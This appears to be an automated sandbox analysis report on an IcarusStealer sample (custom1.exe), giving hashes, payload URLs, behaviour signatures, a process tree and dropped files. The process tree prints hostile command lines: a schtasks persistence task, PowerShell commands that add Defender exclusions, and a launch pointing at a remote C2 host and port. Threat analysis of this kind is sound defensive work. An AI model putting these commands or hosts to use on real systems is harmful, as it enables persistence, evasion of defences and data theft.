Overview

overview

10

Static

static

3

custom1.exe

windows7-x64

10

custom1.exe

windows10-2004-x64

10

Resubmissions

09/03/2024, 09:55

240309-lx3qwsef83 10

09/03/2024, 09:49

240309-ltvk4sef73 10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/03/2024, 09:55

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    custom1.exe

  • Size

    24.9MB

  • MD5

    4e1c29f0c1af62ddea916c6b80548c76

  • SHA1

    38d9f15356b6a65f4e76ee739867d55b01493793

  • SHA256

    13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

  • SHA512

    f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28

  • SSDEEP

    49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score
10/10
icarusstealerpersistencestealer

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

    stealericarusstealer
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\custom1.exe
    "C:\Users\Admin\AppData\Local\Temp\custom1.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1276
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4856
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:3252
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp74A3.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3748
        • C:\Windows\System32\Conhost.exe
          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          4⤵
            PID:3212
          • C:\Windows\SysWOW64\timeout.exe
            timeout 3
            4⤵
            • Delays execution with timeout.exe
            PID:1116
          • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
            "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious use of AdjustPrivilegeToken
            PID:4828
      • C:\Users\Admin\AppData\Local\Temp\switched.exe
        "C:\Users\Admin\AppData\Local\Temp\switched.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4908
        • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
          "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of WriteProcessMemory
          PID:2504
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1712
            • C:\Windows\system32\certutil.exe
              certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
              5⤵
                PID:3588
              • C:\Windows\system32\find.exe
                find /i /v "md5"
                5⤵
                  PID:2704
                • C:\Windows\system32\find.exe
                  find /i /v "certutil"
                  5⤵
                    PID:3212
              • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
                "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2936
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0m3bcvs0\0m3bcvs0.cmdline"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2200
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6B1E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3BC5387FABDE4265B5767F63965E68F0.TMP"
                    5⤵
                      PID:1360
                  • C:\Windows\explorer.exe
                    "C:\Windows\explorer.exe"
                    4⤵
                    • Modifies Installed Components in the registry
                    • Enumerates connected drives
                    • Checks SCSI registry key(s)
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:3936
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1072
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4816
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4540
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4292
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                        6⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4544
            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
              1⤵
              • Modifies registry class
              • Suspicious use of SetWindowsHookEx
              PID:2304
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
              1⤵
                PID:3588
              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                1⤵
                • Modifies Internet Explorer settings
                • Modifies registry class
                • Suspicious use of SetWindowsHookEx
                PID:2120
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 2120 -s 4148
                  2⤵
                    PID:4292
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:220
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:2180
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:1516
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                  • Modifies Internet Explorer settings
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:3308
                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                  1⤵
                  • Modifies registry class
                  PID:928

                Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                        Filesize

                        2KB

                        MD5

                        968cb9309758126772781b83adb8a28f

                        SHA1

                        8da30e71accf186b2ba11da1797cf67f8f78b47c

                        SHA256

                        92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                        SHA512

                        4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Filesize

                        16KB

                        MD5

                        0044a649c06e48581ca8586e4d110be3

                        SHA1

                        7e97287140f0dae70d8dbe7efa9167a57e881c46

                        SHA256

                        12633cd38c50a848967d2977f81e9224f15104697ad6fdb7b5ea070627851d62

                        SHA512

                        ac9f875375ebadf3feda4525ea66589e5a60d0228036621bfc39c799c315c2e7de63f81a79af37a07a1efe12b1bdcb0de9ae984f247dab9d2a1c49abda1a0f6c

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15
                        Filesize

                        36KB

                        MD5

                        0e2a09c8b94747fa78ec836b5711c0c0

                        SHA1

                        92495421ad887f27f53784c470884802797025ad

                        SHA256

                        0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36

                        SHA512

                        61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel
                        Filesize

                        36KB

                        MD5

                        fb5f8866e1f4c9c1c7f4d377934ff4b2

                        SHA1

                        d0a329e387fb7bcba205364938417a67dbb4118a

                        SHA256

                        1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170

                        SHA512

                        0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4VHCF0PY\microsoft.windows[1].xml
                        Filesize

                        97B

                        MD5

                        b00643a38637847dab98bfa6c2d53f4e

                        SHA1

                        983055bd38dff9849c550ae053cd3592db217147

                        SHA256

                        a64b8e9193f1537d2bb5f68c17018abf732832ebe4885933819f019ff9410841

                        SHA512

                        9acf44ec12ef307e812442dfd45408a6d6db702b698ae1b47b9ea8643fb0747d38baae833e8e1b9d2b540c1bfb5e2e34698c7cf6cb73555075a17fd0da7db9e2

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\Client.exe
                        Filesize

                        3.8MB

                        MD5

                        3fd4631f10c52fbf309d12f81fc774cd

                        SHA1

                        c8bc6e2932f6f3acab757f9c99aac2937ef7df2d

                        SHA256

                        fa200ad81e353e08cde26160a4274ba6155f6a1099e3d067e017e6d33c97690d

                        SHA512

                        e18d36e23b47091cb2c68bd001ce780d276d7916c1f0e363322cfd267aadedc9403d09e7d014f39e28d912f48c576e57ad95b3e631121556b0df9987a9d20cfd

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\Client.exe
                        Filesize

                        7.8MB

                        MD5

                        a9696c84d1bc8731fda72d5073f0cfe3

                        SHA1

                        c364c3a16ee68efb9b9a91e6ed51cd0bdf9af45a

                        SHA256

                        dd576bb7be7807a85506c5687a7a34726abbb16e5324dc614210ec3abb1ff14b

                        SHA512

                        956709deead60d1517f23de733822c359b646155f7d32e0750414c0e6160096793c1020b9d1fb6b7775208cd0b112ccb03128a5d1c4c4b354bbd7860063c0ddf

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\Client.exe
                        Filesize

                        4.3MB

                        MD5

                        2943b1e319864a753efdf0a04548b90c

                        SHA1

                        96149a8e5ed1149e51b908a01e0dafddbc24fd9e

                        SHA256

                        e0e59f61320a1220596947dadc77ce383fd0c8061c932ad142cd43a71821743b

                        SHA512

                        7fa5001d7e2e810a808ba400b40afe3dccd9f912987e1417f1749c1250a97e4a55d7eaa74ee1fa5fa7e716785b30a16edc2c5db611d33f66bb8c840ad0c79bc4

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\RES6B1E.tmp
                        Filesize

                        1KB

                        MD5

                        19486b6949cf15b1c1003b002b904819

                        SHA1

                        3417a6af356a74cce6bae768550655fe3483a89a

                        SHA256

                        3f89efbe7ed915c9a44dffdf1dd3723a73852b48504f1a5e00f544914c8c67b5

                        SHA512

                        d32d09c5ef19f61a21f7600afffbf19f349b6dacf0f5d8e4e5749bee2646615e56c4eec99a5e80f76a2286a0d541f8a42a3fc39c88cea38143b07dbb65ce987b

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ye0wuctw.eai.ps1
                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
                        Filesize

                        3.2MB

                        MD5

                        ceb8c3c0f2249f05f3df8f88d46ae743

                        SHA1

                        651675ba157c085ce64aa5bb2abbfd6f5efc75c6

                        SHA256

                        a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778

                        SHA512

                        872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
                        Filesize

                        128KB

                        MD5

                        f4c85141161170e90f30d45d056775a4

                        SHA1

                        3b25701f8cab37cc71a8b7fe4f7bec1875489299

                        SHA256

                        5a817c67784ae4fd0fb9320ca1afa51c43c4a754decfdb855b7a21437012aa92

                        SHA512

                        76fbd5e22ad1c1403dcb78270d2ac9ec5372bc42e48ba7d99e9676094d5ee306b81d3cecf724f4f542bed2fd6f865a8cd4a491c5d86be48cf203f6ba59a31b97

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
                        Filesize

                        2.6MB

                        MD5

                        b98fb4c7a5245eadc8fb16392c96bfd4

                        SHA1

                        5cf6ae3773671eff63f8590b596ce7947450647d

                        SHA256

                        92a70bda509aebb386624c19ef1e52cb393b0edbc6176476f5b7bbd371f30f81

                        SHA512

                        a9cbf639daa3e6f1020784eb18faf5a6a8b1c72854c22f6c6c29867f67aac58915c9fdd67ba66718a869d8f4b975878403f3aac40edea7e9815b340719c64aa9

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\switched.exe
                        Filesize

                        3.7MB

                        MD5

                        b9bbe31d276de5c3d05352d070ae4244

                        SHA1

                        5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

                        SHA256

                        a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

                        SHA512

                        0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
                        Filesize

                        494KB

                        MD5

                        0f0838bc6642dd6bc603368e50b4aba3

                        SHA1

                        932bd4d1c11996bf8ac3ac74a94b266e96d44c36

                        SHA256

                        4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

                        SHA512

                        a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

                        Download Submit

                      • C:\Users\Admin\AppData\Local\Temp\tmp74A3.tmp.bat
                        Filesize

                        150B

                        MD5

                        09b5eb7141508b27fd9ce1f36164b895

                        SHA1

                        6c06f4f7157a93ea189bb7af615dc200bb7fa084

                        SHA256

                        7bdafd3954861f26e33631d1600a2317c3657413bd92ecf7b9e54558394695a7

                        SHA512

                        139af9d58f1dc7b4aa022255356125dd8ea0ca6fed744c92a61e577a0f3d8991be30f52ecf11d1698bb7440de3f650eb118ed99ea774bfde9d0a043ade065339

                        Download Submit

                      • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
                        Filesize

                        2.9MB

                        MD5

                        69923a406fb704a729a8079bde01847d

                        SHA1

                        90534ce5e01bbc25da37808d99def3f36b5d09e8

                        SHA256

                        cf11c5fd11953b5047d08bce8d65219a06f648ab230b08efa99346f7cf019517

                        SHA512

                        963a705a2850aa6f10d6c2e565e14b1fe92eb37d62f0758f305f4c85bc7ab071fa5a28ad0c0bd00955e2a7b1e9c6fc8e9e15fe9e0adfdb49f2fe9b5040e7e800

                        Download Submit

                      • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
                        Filesize

                        3.1MB

                        MD5

                        35aacbff43ce73ac748965648fb212e7

                        SHA1

                        df644ab54ed3964eacad3582d1d1ccc2c7c69b53

                        SHA256

                        be456f95a11dcaac58af77ed485750cdddcf441316bb9115ed3d5a907d74b428

                        SHA512

                        77a45684c805a3ba4f29aae7485675952525f3e24da4be6d6acdf5031ac65509c5c71489827229632ed3ab3aea66de3b278da21cdd36992887029b0fb77ca876

                        Download Submit

                      • C:\Windows\System32\CatRoot\$SXR\Read.txt
                        Filesize

                        58B

                        MD5

                        79668a6729f0f219835c62c9e43b7927

                        SHA1

                        0cbbc7cc8dbd27923b18285960640f3dad96d146

                        SHA256

                        6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

                        SHA512

                        bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\0m3bcvs0\0m3bcvs0.0.cs
                        Filesize

                        1KB

                        MD5

                        14846c9faaef9299a1bf17730f20e4e6

                        SHA1

                        8083da995cfaa0e8e469780e32fcff1747850eb6

                        SHA256

                        61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

                        SHA512

                        549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\0m3bcvs0\0m3bcvs0.cmdline
                        Filesize

                        448B

                        MD5

                        3a821ad1e954968c72e2ff3f436b7409

                        SHA1

                        0ed2c75a53f8f6317b9365f633461cb59b4e12bd

                        SHA256

                        e7e2dc3e897b94724c6cb0e37c6b4e451aa42649aaff8abbc3fe1ecf6e5d7f38

                        SHA512

                        ac15840ad107a7e9bd7905827d782b4141d77335db2476718d5e3f0be744045e323f56818db31d08ab54e10267b152f422a0b4ebc13f522bfa95efacd525a794

                        Download Submit

                      • \??\c:\Users\Admin\AppData\Local\Temp\CSC3BC5387FABDE4265B5767F63965E68F0.TMP
                        Filesize

                        1KB

                        MD5

                        e9144225655a1177485a6238f397718e

                        SHA1

                        0618d989814312c38b8005fc469222f891470642

                        SHA256

                        f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d

                        SHA512

                        392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4

                        Download Submit

                      • memory/220-192-0x00000214852D0000-0x00000214852F0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/220-190-0x0000021485310000-0x0000021485330000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/220-194-0x0000021485960000-0x0000021485980000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/1072-63-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/1072-64-0x00000000056F0000-0x0000000005700000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/1072-204-0x00000000056F0000-0x0000000005700000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/1072-157-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/1072-60-0x0000000000400000-0x0000000000424000-memory.dmp

                        Filesize

                        144KB

                        Download

                      • memory/1276-20-0x0000000000520000-0x0000000000B60000-memory.dmp

                        Filesize

                        6.2MB

                        Download

                      • memory/1276-61-0x0000000002E10000-0x0000000002E32000-memory.dmp

                        Filesize

                        136KB

                        Download

                      • memory/1276-21-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/1276-72-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/1276-62-0x0000000005440000-0x00000000054A6000-memory.dmp

                        Filesize

                        408KB

                        Download

                      • memory/1276-40-0x0000000002DD0000-0x0000000002DE0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/1276-96-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/1516-233-0x00000289C6620000-0x00000289C6640000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/1516-235-0x00000289C63E0000-0x00000289C6400000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/1516-237-0x00000289C69F0000-0x00000289C6A10000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/2120-169-0x0000022343DF0000-0x0000022343E10000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/2120-167-0x00000223439E0000-0x0000022343A00000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/2120-165-0x0000022343A20000-0x0000022343A40000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/2180-212-0x000001EEE2A20000-0x000001EEE2A40000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/2180-215-0x000001EEE27E0000-0x000001EEE2800000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/2180-217-0x000001EEE2EA0000-0x000001EEE2EC0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/2504-37-0x00007FF7AF1E0000-0x00007FF7AF61C000-memory.dmp

                        Filesize

                        4.2MB

                        Download

                      • memory/2504-122-0x00007FF7AF1E0000-0x00007FF7AF61C000-memory.dmp

                        Filesize

                        4.2MB

                        Download

                      • memory/2936-66-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/2936-42-0x0000000000D90000-0x0000000000E12000-memory.dmp

                        Filesize

                        520KB

                        Download

                      • memory/2936-44-0x0000000005680000-0x000000000571C000-memory.dmp

                        Filesize

                        624KB

                        Download

                      • memory/2936-43-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/2936-45-0x0000000005720000-0x00000000057B2000-memory.dmp

                        Filesize

                        584KB

                        Download

                      • memory/2936-47-0x0000000007310000-0x00000000078B4000-memory.dmp

                        Filesize

                        5.6MB

                        Download

                      • memory/2936-46-0x0000000005940000-0x0000000005950000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3308-255-0x00000293A5DA0000-0x00000293A5DC0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3308-253-0x00000293A5DE0000-0x00000293A5E00000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3308-258-0x00000293A63C0000-0x00000293A63E0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/3936-159-0x0000000003290000-0x0000000003291000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/4540-78-0x00000000059D0000-0x0000000005A36000-memory.dmp

                        Filesize

                        408KB

                        Download

                      • memory/4540-140-0x0000000007600000-0x0000000007611000-memory.dmp

                        Filesize

                        68KB

                        Download

                      • memory/4540-139-0x0000000007670000-0x0000000007706000-memory.dmp

                        Filesize

                        600KB

                        Download

                      • memory/4540-145-0x0000000007630000-0x000000000763E000-memory.dmp

                        Filesize

                        56KB

                        Download

                      • memory/4540-138-0x0000000007480000-0x000000000748A000-memory.dmp

                        Filesize

                        40KB

                        Download

                      • memory/4540-135-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4540-148-0x0000000007720000-0x0000000007728000-memory.dmp

                        Filesize

                        32KB

                        Download

                      • memory/4540-134-0x0000000002BA0000-0x0000000002BB0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4540-123-0x00000000740D0000-0x000000007411C000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/4540-154-0x0000000073370000-0x0000000073B20000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/4540-108-0x0000000006170000-0x00000000061BC000-memory.dmp

                        Filesize

                        304KB

                        Download

